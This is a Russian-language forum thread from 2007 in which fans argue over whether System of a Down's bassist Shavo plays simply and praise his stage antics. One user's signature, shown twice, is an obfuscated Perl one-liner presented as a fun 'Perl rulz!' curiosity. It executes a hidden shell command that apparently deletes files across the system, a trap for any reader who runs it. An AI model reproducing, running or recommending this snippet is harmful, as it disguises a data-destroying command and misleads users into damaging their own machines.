сложно.... у нас редко ктото на сервере бывает кроме меня _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
кроме нашего канала не знаю _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
насчет фотки, там слева какая-то лесбияночка ? с таким аппетитом смотрит
а Шаво одного взгляда мало, ему бы пощупать _________________ Define the riddles of my mind
nothing is really as it seems
As-T, номинально его партии черезвычайно простые - у меня несколько другое представление, что значит "играть на басу") _________________ Fortuna non penis in manus non recipe
genj, поведение на сцене посмотри.)
Так тоже надо уметь ибо столбом на сцене стоять - тоже не айс.) _________________ Fortuna non penis in manus non recipe
Добавлено: Вс Авг 12, 2007 6:54 am Заголовок сообщения:
Пример?
Все что слушается отдельно и от этого получаешь удовольствие, где партия интересна на слух.
Можно конечно и "В траве сидел кузнечик" считать мегомузыкой
Под простотой я подразумеваю не только то, что он в основном в песне играет на одном ладу на двух струнах (как пример), то есть - не только о техничности. В этом, впрочем вина не столько может быть Шаво, сколько самой музыки - она в основном своем в SOAD проста, но хоть игра на гитаре в данном случае с точки зрения техничности и не особо сложная (хотя от альбома к альбому она возрастает хы), меня, например она как-то цепляет (не говоря уж о Долмаяне), игра Шаво - нет - он просто подыгрывает. _________________ Fortuna non penis in manus non recipe
Добавлено: Вс Авг 12, 2007 7:12 am Заголовок сообщения:
Maynard
Цитата:
музыки - она в основном своем в SOAD проста
особенно в последних 2х..
пример не привел,групп или у исполнителей где партия на басу была сложной... _________________ Define the riddles of my mind
Ты ждешь, что я начну приводить в пример каких-нибудь монстров вроде Фли или Вутена? Ну с ними в ряду Шаво вряд-ли стоит. _________________ Fortuna non penis in manus non recipe
Добавлено: Вс Авг 12, 2007 8:57 am Заголовок сообщения:
насчет альбомов - даже критики у которых нормальный альбом это обязательно замудренный и которые давно уже не смотрят в сторону Korn, лп и лб, а стиль ню-метал (хотя понятно что система не форматная группа и определенный стиль нельзя назвать) вообще обсирают были в восторге от альбомов, а по мне так многое из этих альбомов сложно исполнить в живую ? пример B.y.o.b. трудно припомнить удачно исполненную ? неплохо было на выступление MTV...
примеры игры Шаво которые ты привел, как соло ясное дело детсад, а для группы это нормально
Виктор Вутен ? нельзя с ним сравнивать, хотя бы из-за того что он лидер басс-гитар, про стиль я уж не говорю...
тоже самое у Фли... _________________ Define the riddles of my mind
поведение на сцене посмотри.)
Так тоже надо уметь ибо столбом на сцене стоять - тоже не айс.)
Да-да насчёт поведения он умеет задорно похулиганить.Я из-за этого люблю смотреть их концерты.Они делают что им нравится , а главное вовремя это делают.